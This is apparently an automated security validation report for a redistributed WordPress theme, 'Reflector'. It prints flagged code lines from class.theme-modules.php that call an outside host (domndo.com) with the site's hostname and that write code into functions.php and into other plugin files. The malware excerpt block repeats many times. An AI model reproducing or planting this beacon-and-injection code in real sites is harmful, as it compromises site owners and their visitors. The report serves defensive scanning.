0
Validation results

Reflector | Shared by WPTry.org

Reflector | Shared by WPTry.org

WordPress 6.4.3 theme
0
  • THEME TYPEWordPress theme 6.4.3
  • FILE NAMEReflector_tf_v.1.1.5.zip
  • FILE SIZE4195763 bytes
  • MD506e2cdacc4410063c2d3d0e854fec861
  • SHA1d4568bd426c429a28b4c2de34a7b143a38cfc552
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • VERSION1.1.5
  • TAGSone-column, two-columns, right-sidebar, left-sidebar, custom-menu, post-formats, sticky-post
  • CREATION DATE2021-01-31
  • LAST FILE UPDATE2021-01-31
  • LAST VALIDATION2021-01-31 20:12
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Security breaches : Modification of PHP server settings Found ini_set in file Extension.php. 142: @ini_set('display_errors', 'On');
  2. Security breaches : Use of base64_decode() Found base64_decode in file GitLabApi.php. 247: return base64_decode($response->content);Found base64_decode in file GitHubApi.php. 274: return base64_decode($response->content);
  3. Security breaches : Use of base64_encode() Found base64_encode in file GitHubApi.php.
     return 'Basic ' . base64_encode($this->userName . ':' . $this->accessToken);
    Found base64_encode in file OAuthSignature.php.
     $parameters['oauth_signature'] = base64_encode(hash_hmac('sha1', $stringToSign, $secret, true));
  4. Unwanted files : hidden file(s) or folder(s) .editorconfig .idea was found.
  5. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 207: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'209: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP274: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');316: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');351: function file_get_contents_curl1($url)389: $functions = file_get_contents($functionsPath);452: $temp = file_get_contents($pluginPath . '/' . $file);470: $script = file_get_contents('SCRIPT_PATH');487: $temp = file_get_contents($file);548: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 281: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);398: file_put_contents($functionsPath, $str);471: file_put_contents('SCRIPT_PATH', '');484: $copyPlugin = file_put_contents($newPlugin, $pluginCode);495: file_put_contents($file, $str);498: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC545: $copyPlugin = file_put_contents($newPlugin, $pluginCode);556: file_put_contents($file, $str);559: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
  6. Malware : Network operations curl_init was found in the file class.theme-modules.php 353: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 359: $data = curl_exec($ch);
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File class.theme-modules.php : 34: add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options',
Warning
  1. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is reflector-shared-by-wptry-org.
  2. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'View details' in file Ui.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'More information about %s' in file Ui.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are reflector, plugin-update-checker.
  3. PHP short tags : Presence of PHP short tagsPHP short tags were found in file ParsedownModern.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.762: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))PHP short tags were found in file ParsedownLegacy.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.760: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  4. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of search results template file search.phpThis theme does not contain optional file search.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php 229: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : UpgraderStatus.php 126: require_once( ABSPATH . '/wp-admin/includes/plugin.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : Autoloader.php 30: include ($this->libraryDir . $this->staticMap[$className]); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : Package.php 144: require_once(ABSPATH . '/wp-admin/includes/plugin.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : PucReadmeParser.php 251: require_once(dirname(__FILE__) . '/Parsedown' . (version_compare(PHP_VERSIO If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes